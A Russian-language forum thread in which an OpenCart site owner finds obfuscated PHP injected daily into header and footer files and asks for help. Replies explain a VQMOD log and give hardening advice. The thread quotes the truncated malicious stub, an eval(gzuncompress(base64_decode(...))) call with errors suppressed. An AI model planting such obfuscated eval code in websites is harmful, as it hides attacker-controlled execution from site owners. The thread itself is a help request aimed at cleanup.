Перейти к содержанию
kleem

инородный PHP на сайте

Рекомендуемые сообщения

Здравствуйт

 

инородный PHP код в header и footer в директориях catalog/controller/common

 

грешу на VQMOD

 

в его логах есть такие строчки:

 

---------- Date: 2015-02-20 03:22:13 ~ IP : 46.161.41.199 ----------
REQUEST URI : /index.php?route=account/transaction
MOD DETAILS:
   modFile   : /var/www/enelt/data/www/eneltcom.by/vqmod/xml/vqmod_admin_apply_button_admin_product_1.5.1.3.xml
   id        : Admin Apply button (products, category, manufacturer, information, news)
   version   : 1.0.0
   vqmver    : 1.0.8
   author    : stalker780
Could not resolve path for [admin/controller/catalog/news.php] (SKIPPED)
Could not resolve path for [admin/view/template/catalog/news_form.tpl] (SKIPPED)
 
что за сталкер? что это такое вообще!?
 
буду благодарен за помощь!
 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

кнопка "применить" в админке, мод не находит файлов catalog/news.php, catalog/news.php

по умолчанию в движке их нет

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

по vqmod freelancer написал.

а что за "инородный PHP код в header и footer в директориях catalog/controller/common" ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ежедневно правит файлы хедер и футер. от чего перестают грузиться сайт. 

<?php
//###=###
error_reporting(0); ini_set("display_errors", "0"); eval(gzuncompress(base64_decode('eNqde/tzE+X3/7+ydvyMFGK6tyStfPp1uBTkWmgBEcu3s5Z+D8YBrjV........ и т.д.')));
//###=###
 
//###=###
error_reporting(0); ini_set("display_errors", "0"); eval(gzuncompress(base64_decode('eNqde/tzE+X3/7+ydvyMFGK6tyStfPp1uBTkW8YBrjV....и т.д.')));
//###=###
?>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

сканируй на shell-скрипты и прочую дрянь,

меняй данные для доступа на ftp,

меняй права на файлы на жесткие 644 (или и того меньше), чтобы только твой пользователь/аккаунт мог работать с файлами. (никаких 777 и "записи для others")

если рядом валяются joomla,wordpress итпд - подумай о разделении пространства. там часто густо дырки всплывают, через которые можно добраться и до других файлов.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

сканируй на shell-скрипты и прочую дрянь,

меняй данные для доступа на ftp,

меняй права на файлы на жесткие 644 (или и того меньше), чтобы только твой пользователь/аккаунт мог работать с файлами. (никаких 777 и "записи для others")

если рядом валяются joomla,wordpress итпд - подумай о разделении пространства. там часто густо дырки всплывают, через которые можно добраться и до других файлов.

Я добавлю свои пять копеек:

И не качайте модули на варезах, там некоторые ублюдки вставляют шеллы и трояны в модули.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.